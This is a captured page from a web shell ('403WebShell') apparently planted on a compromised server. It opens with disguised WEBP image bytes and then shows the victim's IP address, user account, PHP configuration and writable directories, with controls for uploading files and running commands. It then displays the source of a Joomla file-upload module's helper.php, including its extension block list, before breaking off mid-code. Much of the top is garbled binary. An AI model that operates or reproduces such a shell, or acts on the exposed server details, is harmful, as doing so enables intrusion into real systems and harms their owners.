....................................../////.===Shadow-Here===./////................................................ > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < ------------------------------------------------------------------------------------------------------------------- /////////////////////////////////////////////////////////////////////////////////////////////////////////////////// RIFF¤ WEBPVP8 ˜ ðÑ *ôô>‘HŸK¥¤"§£±¨àð enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿ /ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g gÆv›Øuh~ a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô ^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>ÄÍ ¥ˆuߤ#ˆ$6ù™¥îЇy’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ ¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×U ñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒw޼GÔ´zàÒò ð*ëzƒ•4~H]Ø‹f ñÓÈñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J ù…î èo£ßPÎñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~ ©¹rÓê‚j¶d¸{^Q'˜±Crß ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€IßÚù+–MGi‰*jE€‘JcÜ ÓÌ EÏÚj]o˜ Þr <¾U ûŪæÍ/šÝH¥˜b”¼ ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI %1À% ¹Ò – ”ϝS¦‰4&¶£°à Öý”û_Ò Áw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ß Õû˜þãÇ-PÍ.¾XV‘€ dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:F±Ú” .Ѽ+Áu&Ç`."pÈÉw o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ '²Ð öø_¨ÂÉ9ué¶³ÒŠõTàîMØ#û¯gN‡bÙ놚X„ö …ÉeüÌ^J ‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB «Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•╪Vêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•ñ·­(VlŸ‘ nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z H“C}”¬,Mp ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð !BÔ Ç¢Ä©š+Õì D«7ìN¶ŽðÔ " ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹êN[Ò3Œñbï8P 4ƒ×q¢bo|?<ÛX¬òÄͰL–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô ¾–ÄÏø ×e8Ë©$ÄF¹Å‹ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™Mÿþ(±“t@â“ö2­´TG5yé]çå僳 .·ÍïçÝ7UÚ±Ð/Nè»,_Ï ùdj7\ï Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢ š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï 3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ 0fãaN]òY³RV ™î$®K2R¨`W!1Ôó\;Ý ýB%qæK•&ÓÈe9È0êI±žeŸß -ú@žQr¦ ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí ;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né `ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€ 05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6] µÆ„Ooòü ²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6 ¢}`ùH­–”¡k ‰P1>š†®9z11!X wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýcå¡¶7ßŠß 57^\wÒÐÆ k§h,Œý î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} ³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtà 0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2 †üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼ ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“ wiÎ×7_… ¸ \#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀ qªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒ qÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ (øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼ „±ÍçèSaÓ 3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œïJ·±$§?º>ÖüœcNÌù¯G ‹ñ2ЁBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ ‰ p5?0ÊÆƒZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳ è¼ÐFׄ^¡Öì fE“F4A…!ì/…¦Lƒ… … $%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š Â* ­íÄ9­< h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:! Aõ.ç~ÓBûH÷JCÌ]õVƒd «ú´QÙEA–¯¯Œ!.ˆˆëQ±ù œ·Ì!Õâ )ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù+p{™ðè û³”g±OƒÚSù£áÁÊ„ä,ï7š²G ÕÌBk)~ÑiCµ|h#u¤¶îK¨² #²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜ ŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4 zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñëäg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\ ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû …‚g¶Úüâî*moGè¨7%u!]PhÏd™Ý%Îx: VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5 Œ%u5XkñÌ*NU%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´ ÒÊ]y žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü .̘¯€šòü¤U~Ù†*¢!?ò wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯  B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1 ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_ µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo §—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~  ‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ ®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF ±Ê8 7Hցϓ²Æ–m9…òŸï]Â1äN†VLâCˆU .ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘ |¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð E6-‡¼!ýpãÔM˜ Âsìe¯ñµK¢Ç¡ùôléœ4Ö£”À Š®Ðc ^¨À}ÙËŸ§›ºê{ÊuÉC ×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò· àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£Xé¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@NŠ À(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 403WebShell
403Webshell
Server IP : 195.3.193.30  /  Your IP : 216.73.216.125
Web Server : Apache
System : Linux server3 5.10.0-35-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User : web032 ( 1035)
PHP Version : 7.3.33
Disable Function : show_source, highlight_file, apache_child_terminate, apache_get_modules, apache_note, apache_setenv, virtual, dl, disk_total_space, posix_getpwnam, posix_getpwuid, posix_mkfifo, posix_mknod, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_nice, openlog, syslog, pfsockopen
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/web032/htdocs/cms/modules/mod_simplefileuploadv1.3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/web032/htdocs/cms/modules/mod_simplefileuploadv1.3/helper.php
<?php

defined('_JEXEC') or die('Direct Access to this location is not allowed.');


class ModSimpleFileUploaderHelperv13{	
	
	function getUploadForm(
			&$params,
			$upload_location,
			$sfu_basepath,
			$mid, 
			$upload_users,
			$users_name
		) {			
		
			// Get settings:
			$upload_maxsize = $params->get( 'upload_maxsize', '100000' );
			$upload_filetypes = $params->get( 'upload_filetypes', '' );
			$upload_fileexist = $params->get( 'upload_fileexist', '' );
			$upload_email = $params->get( 'upload_email', '' );
			$upload_emailmsg = $params->get( 'upload_emailmsg', '0' );
			$upload_emailhtml = $params->get( 'upload_emailhtml', '1' );
			$upload_unzip = $params->get( 'upload_unzip', '0' );
			$upload_showerrmsg = $params->get( 'upload_showerrmsg', '1' );
			$upload_showdircontent = $params->get( 'upload_showdircontent', '0' );
			$upload_popshowpath = $params->get( 'upload_popshowpath', '1' );
			$upload_popshowbytes = $params->get( 'upload_popshowbytes', '0' );
			$upload_blacklist = $params->get( 'upload_blacklist', '.php .php3 .php4 .php5 .php6 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .exe .bat .cmd .htaccess' );
			$upload_doubleext = $params->get( 'upload_doubleext', '1' );
			$upload_phpext = $params->get( 'upload_phpext', '1' );
			$upload_gifcomment = $params->get( 'upload_gifcomment', '1' );
			$upload_mailfrom = $params->get( 'upload_mailfrom' , 'noreply@simplefileupload.com' );
			$upload_maximgwidth = $params->get( 'upload_maximgwidth', '0' );
			$upload_maximgheight = $params->get( 'upload_maximgheight', '0' );
			$upload_compressimg = $params->get( 'upload_compressimg', '' );
			$upload_disablegdlib = $params->get( 'upload_disablegdlib', '0' );
			$upload_disablegdthreshold = $params->get( 'upload_diablegdthreshold', '0' );
			
			$upload_thumbcreate = $params->get( 'upload_thumbcreate', '0' );
			$upload_thumbsize = $params->get( 'upload_thumbsize', '40x40' );
			$upload_thumbname = $params->get( 'upload_thumbname', 'sfuthumb' );
			$upload_debug = $params->get( 'upload_debug', '0' );
			
			$upload_formfields = $params->get( 'upload_formfields', '' );
			$upload_useformsfields = $params->get( 'upload_useformsfields', '0' );
			if ($upload_useformsfields == 0) 
				$upload_formfields = "";
			$upload_formfieldsfile = $params->get( 'upload_formfieldsfile', '' );
			$upload_formfieldsdiv = $params->get( 'upload_formfieldsdiv', '|' );
			
			$upload_nohtmlencoding = $params->get( 'upload_nohtmlencoding', '0' );
			$upload_replacetag = $params->get( 'upload_replacetag', '0' );
		    
			$results = "";
			$fileCnt = 0;
			$fileErr = 0;
			$written = 0;
			$filename = "";
			$fileList = "";
			$fileInfo = "";
			$filetypeok = true;
			$filetype = "";
			$blacklist = explode(" ", $upload_blacklist);
			$formfieldsval = array();
			$formfieldsemail = array();
			$chkfileexist = "";

			$baseurl = "";
			$serverurl = "";
			$protocol = "";
			$protocol = "http://";
		
			if (substr($_SERVER["HTTP_REFERER"], 0, 5) === "https") $protocol = "https://";
			$folder = substr($_SERVER['SCRIPT_NAME'], 0, strrpos($_SERVER['SCRIPT_NAME'], "/"));
			if ($folder === "//") $folder = "";
			// Check if relative path
			if (substr($upload_location, 0, 1) === ".") {
				$serverurl .= str_replace(".", $protocol.$_SERVER["HTTP_HOST"].$folder, $upload_location);
				// Fix Windows path...
				$baseurl .= str_replace("\\", "", $serverurl);
			} else {
				if ((substr($upload_location, 1, 2) === ":\\") || (substr($upload_location, 0, 1) === "/")) {
					// Server root path
					$baseurl = "file://".str_replace("\\", "/", $upload_location);
				} else {
					$serverurl = str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]);
					$baseurl = str_replace("\\", "/", $upload_location);
					$baseurl = str_replace($serverurl, "", $baseurl);
					//$baseurl = dirname($_SERVER["HTTP_REFERER"])."/".$baseurl;
					$baseurl = $protocol.$_SERVER["HTTP_HOST"].$folder."/".$baseurl;
				}
			}
			//Replace space with %20 for URL
			$baseurl = str_replace(" ", "%20", $baseurl);
			// Make sure it ends with front slash
			if ( substr( $baseurl , strlen($baseurl) - 1) !== "/" ) {
				$baseurl .= "/";
			}
			
			if(is_array($_FILES["uploadedfile$mid"]["name"])) {
				foreach($_FILES["uploadedfile$mid"]["name"] as $value) {
					/* Not really useful since I need type and size as well... just use $_FILES
					if(strlen($value) > 0) {
						//Check that we have a filename
						$filenames[] = $value;
					}*/
					$fileCnt += 1;
				}
			}
			
			for ($cnt = 0; $cnt<$fileCnt; $cnt++) {
			
				if ((strlen($_FILES["uploadedfile$mid"]["name"][$cnt]) > 0) && ($upload_users === "true")) {
				
					// Check blacklist first
					foreach ($blacklist as $file) {
						$filename = $_FILES["uploadedfile$mid"]["name"][$cnt];
						
						if (preg_match("/$file\$/i", $filename)) {
							$filetypeok = false;
							break;
						}
					}
					
					// Check double extension
					if ($upload_doubleext === "1" || $upload_phpext === "1") {
					
						$exts = explode('.', $filename);
						// There is more than one dot!
						if (count($exts) > 2) {
							// Any double extension blocked
							if ($upload_doubleext === "1") 
								$filetypeok = false;
							
							if ($upload_phpext === "1") {
								// Block .php.
								if (strtolower($exts[count($exts)-2]) === "php") 
									$filetypeok = false;
							}
						} else {
							// Check and block any .php combination
							if (stripos($filename, ".php") !== false) 
								$filetypeok = false;
						}
					}
					
					
					if ($_FILES["uploadedfile$mid"]["error"][$cnt] > 0) {
						// Check if there was any error
						$filetypeok = false;
					}

					if ($filetypeok) {
						$fileList .= $_FILES["uploadedfile$mid"]["name"][$cnt] . "|";
						$filetype = $_FILES["uploadedfile$mid"]["type"][$cnt];
						$fileInfo .= "(" . JText::_('TYPE') . ": " . $filetype . " " . JText::_('SIZE') . ": " . $_FILES["uploadedfile$mid"]["size"][$cnt] . " " . JText::_('BYTES') . ")|";
						
						if ($filetype === "") $filetype = "false";
						if (stripos($upload_filetypes, $filetype) === false) {
							$filetypeok = false;
						} else {
							$filetypeok = true;
						}
						if ($upload_filetypes === "*") {
							$filetypeok = true;
						}
						
						//Check if GIF and block GIF Comment
						if ($upload_gifcomment === "1" && (preg_match("/.gif\$/i", $_FILES["uploadedfile$mid"]["name"][$cnt]))) {
						
							$comment = ModSimpleFileUploaderHelperv13::getGIFComment($_FILES["uploadedfile$mid"]["tmp_name"][$cnt], $upload_debug);
							if(stripos($comment, "getGIFComment:BLOCK") !== false) {
								$filetypeok = false;
							}
							if ($upload_debug == 1) $results .= $comment;
						
						}
						
					}
					
					if (($filetypeok) && ($_FILES["uploadedfile$mid"]["size"][$cnt] < $upload_maxsize)) {
						$errmsg = "";
						$new_filename = "";
						
						if ($_FILES["uploadedfile$mid"]["error"][$cnt] > 0) {
							if (($_FILES["uploadedfile$mid"]["size"][$cnt] == 0) && ($_FILES["uploadedfile$mid"]["error"][$cnt] == 2)) {
								$errmsg = "(<span style='color:#dd2222'>".$_FILES["uploadedfile$mid"]["name"][$cnt].")</span>".JText::sprintf('ERROR_TOO_BIG', "<br />[PHP Error: " . $_FILES["uploadedfile$mid"]["error"][$cnt]) . "]<br />";
							} else {
								$errmsg = "(<span style='color:#dd2222'>".$_FILES["uploadedfile$mid"]["name"][$cnt].")</span>".JText::sprintf('ERROR_LABEL', $_FILES["uploadedfile$mid"]["error"][$cnt]) . "<br />";
							}
							if ($upload_showerrmsg == 1) 
								$results .= $errmsg;
							else
								$results .= JText::_('UPLOAD_FAILED');
							$fileErr = 1;
						} else {
							$bytesfilesize = $_FILES["uploadedfile$mid"]["size"][$cnt];
							// Check to see if GD lib functions should be skipped
							if ($upload_disablegdthreshold > 0) {
								if ($bytesfilesize >= $upload_disablegdthreshold) $upload_disablegdlib = 1;
							}
					  		$filesize = ModSimpleFileUploaderHelperv13::getFileSizePP($bytesfilesize);
							if (($upload_popshowbytes == 1) && ($bytesfilesize != $filesize)) $filesize = $filesize . " (" . $bytesfilesize . " " . JText::_('BYTES') . ")";
							//$results .= "<strong>" . JText::_('FILE_OK_MSG') . "</strong><br /><br />";
							$results .= "<span style='color:#55dd55'>".JText::sprintf('FILE_UPLOAD_LABEL', $_FILES["uploadedfile$mid"]["name"][$cnt]) . "</span><br />";
							$results .= JText::sprintf('FILE_TYPE_LABEL', $_FILES["uploadedfile$mid"]["type"][$cnt]) . "<br />";
							$results .= JText::sprintf('FILE_SIZE_LABEL', $filesize) . "<br />";
							#$results .= "uploaded to: " . $_FILES["uploadedfile$mid"]["tmp_name"][$cnt] . "<br />";
					  		if (file_exists($upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt])) {
								if ( $upload_fileexist === "0" ) {
									// FAIL
									$results .= "<br /><strong>" . JText::sprintf('FILE_EXISTS_MSG', $_FILES["uploadedfile$mid"]["name"][$cnt]) . "</strong><br /><br />" . JText::_('FILE_EXISTS_CORR');
									$fileErr = 1;
								}
								/* // Don't delete until new file has been created!
								if ( $upload_fileexist === "1" ) {
									// REPLACE
									unlink($upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt]);
									$results .= JText::_('FILE_EXISTS_REPLACE') . "<br />";
									$chkfileexist = "no";
								}*/
								
								if ( $upload_fileexist === "2" || $upload_fileexist === "1" ) {
									// BACKUP
									$new_filename = $_FILES["uploadedfile$mid"]["name"][$cnt] . microtime();
									rename($upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $upload_location . $new_filename);
									if ($upload_fileexist === "1")
										$results .= JText::_('FILE_EXISTS_REPLACE') . "<br />";
									else
										$results .= JText::sprintf('FILE_EXISTS_BACKUP',  $new_filename) . "<br />";
									$new_filename = $upload_location . $new_filename;
									$chkfileexist = "no";
								}
							} else {
								$chkfileexist = "no";
							}
							
							if ( $chkfileexist === "no" ) {
							
								// Resize and/or compress?
								$image_resize = false;
								$img_compressimg = 0;
								$img_maximgheight = 0;
								$img_maximgwidth = 0;
								// Check size of images before moving
								if (ModSimpleFileUploaderHelperv13::gd_get_info() && $upload_disablegdlib == 0) {
									
									if (($img = @getimagesize($_FILES["uploadedfile$mid"]["tmp_name"][$cnt])) && (((is_numeric($upload_maximgwidth) && $upload_maximgwidth > 0) || (is_numeric($upload_maximgheight) && $upload_maximgheight > 0)) || ($upload_thumbcreate == 1))) {
										list($width, $height, $type, $attr) = getimagesize($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]);
									
										// Make sure we have a valid compression ratio
										if (!is_numeric($upload_compressimg) || $upload_compressimg > 100 || $upload_compressimg <= 0)
											$img_compressimg = 100;
										else
											$img_compressimg = $upload_compressimg;
								
										if ($upload_maximgheight == 0) 
											$img_maximgheight = $height;
										else
											$img_maximgheight = $upload_maximgheight;
											
										if ($upload_maximgwidth == 0)
											$img_maximgwidth = $width;
										else
											$img_maximgwidth = $upload_maximgwidth;
										
										$ratioh = $img_maximgheight/$height;
										$ratiow = $img_maximgwidth/$width;
										$ratio = min($ratioh, $ratiow);
										// New dimensions
										$n_width = intval($ratio*$width);
										$n_height = intval($ratio*$height); 
										
										$errmsg = "";
										switch ($type) {
											case 1: //'image/gif'
												if (imagetypes() & IMG_GIF)  { // not the same as IMAGETYPE
													$oim = imageCreateFromGIF($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]) ;
												} else {
													$errmsg = "GIF ".JText::_('IMG_TYPE_FAIL')."<br />";
												}
												break;
											case 2: //'image/jpeg'
												if (imagetypes() & IMG_JPG)  {
													$oim = imageCreateFromJPEG($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]) ;
												} else {
													$errmsg = "JPEG ".JText::_('IMG_TYPE_FAIL')."<br />";
												}
												break;
											case 3: //'image/png'
												if (imagetypes() & IMG_PNG)  {
													$oim = imageCreateFromPNG($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]) ;
													$img_compressimg = round($img_compressimg / 10); // Quality is 0-9 for PNG
													if ($img_compressimg >= 10) $img_compressimg = 9; // If user has set quality to 100
												} else {
													$errmsg = "PNG ".JText::_('IMG_TYPE_FAIL')."<br />";
												}
												break;
											case 15: //'image/wbmp'
												if (imagetypes() & IMG_WBMP)  {
													$oim = imageCreateFromWBMP($_FILES["uploadedfile$mid"]["tmp_name"][$cnt]) ;
												} else {
													$errmsg = "WBMP ".JText::_('IMG_TYPE_FAIL')."<br />";
												}
												break;
											default:
												$errmsg = $type." ".JText::_('IMG_TYPE_FAIL')."<br />";
												break;
										}

										if ($errmsg === "") {

											// If thumbnail
											$thumbfilename = "";
											if ($upload_thumbcreate == 1) {

												$img_thumbsize = strtolower($upload_thumbsize);
												$img_thumbsize = explode("x", $img_thumbsize);
												if (is_array($img_thumbsize)) {
													if (count($img_thumbsize) == 2) {
														if (is_numeric($img_thumbsize[0]) && is_numeric($img_thumbsize[1])) {
															$ttim=imagecreatetruecolor($img_thumbsize[0],$img_thumbsize[1]);
															imagecopyresampled($ttim,$oim,0,0,0,0,$img_thumbsize[0],$img_thumbsize[1],$width,$height);
															$ext = substr(strrchr($_FILES["uploadedfile$mid"]["name"][$cnt], '.'), 1);
															$thumbfilename .= substr($_FILES["uploadedfile$mid"]["name"][$cnt], 0, (strlen($_FILES["uploadedfile$mid"]["name"][$cnt])-(strlen($ext) +1))) . "_" . $upload_thumbname . "." . $ext;
															// Make thumb as a link
															$results .= JText::_('IMG_THUMB_FILE') . ' <a href="'.$baseurl.str_replace(" ", "%20", $thumbfilename).'" target="blank">'.$thumbfilename.'</a><br/>';
															//$results .= JText::_('IMG THUMB FILE') . " " . $thumbfilename . "<br />";
															// Add path to thumb filename
															$thumbfilename = $upload_location . $thumbfilename;
														}
													}
												}
											}
											// Only thumbnail, no resize
											if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0) {
												$tim=imagecreatetruecolor($n_width,$n_height);
												imagecopyresampled($tim,$oim,0,0,0,0,$n_width,$n_height,$width,$height);
											}

											switch ($type) {
												case 1:
													// Only thumbnail, no resize
													if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0)
														imageGIF($tim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt]);
													if ($thumbfilename !== "") imageGIF($ttim, $thumbfilename);
													$image_resize = true;
													break;
												case 2:
													// Only thumbnail, no resize
													if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0)
														imageJPEG($tim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $img_compressimg);
													if ($thumbfilename !== "") imageJPEG($ttim, $thumbfilename);
													$img_compressimg = "";
													$image_resize = true;
													break;
												case 3:
													// Only thumbnail, no resize
													if ($upload_maximgheight !== 0 && $upload_maximgwidth !== 0)
														imagePNG($tim, $upload_location . $_FILES["uploadedfile$mid"]["name"][$cnt], $img_compressimg);
